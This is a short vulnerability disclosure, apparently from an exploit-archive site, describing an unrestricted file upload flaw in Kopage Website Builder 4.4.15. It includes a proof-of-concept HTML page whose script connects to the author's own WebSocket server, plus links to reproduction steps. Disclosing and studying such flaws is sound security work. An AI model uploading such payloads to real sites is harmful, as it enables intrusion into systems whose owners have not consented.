Headline
Kopage Website Builder 4.4.15 Shell Upload
Kopage Website Builder version 4.4.15 appears to suffer from a remote shell upload vulnerability.
## Title: Kopage-Website-Builder-4.4.15-File-Upload-RCE## Author: nu11secur1ty## Date: 12/08/2023## Vendor: https://www.kopage.com/## Software: https://demo.kopage.com/index.php## Reference: https://portswigger.net/web-security/file-upload,https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload## Description:The file upload function suffers from file upload vulnerability, thereis no strong sanitizing function for uploading some extension files.In this case, I uploaded an HTML web socket client on their server andthen I connected this client with my javascript server =)Depending on the scenario, this can be the end of privacy and evenworse than ever!I am a Penetration Tester, not a stupid cracker! Thank you all!STATUS: CRITICAL Vulnerability[+]Exploit client:```POST<html> <script>(() => { const ws = new WebSocket('ws://0.0.0.0:8080') ws.onopen = () => { console.log('ws opened on browser') ws.send('hello world you are hacked :D') } ws.onmessage = (message) => { console.log(`message received ${message}`) }})() </script></html>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kopage.com/Kopage-Website-Builder-4.4.15)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/12/kopage-website-builder-4415-file-upload.html)## Time spent:00:35:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ andhttps://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>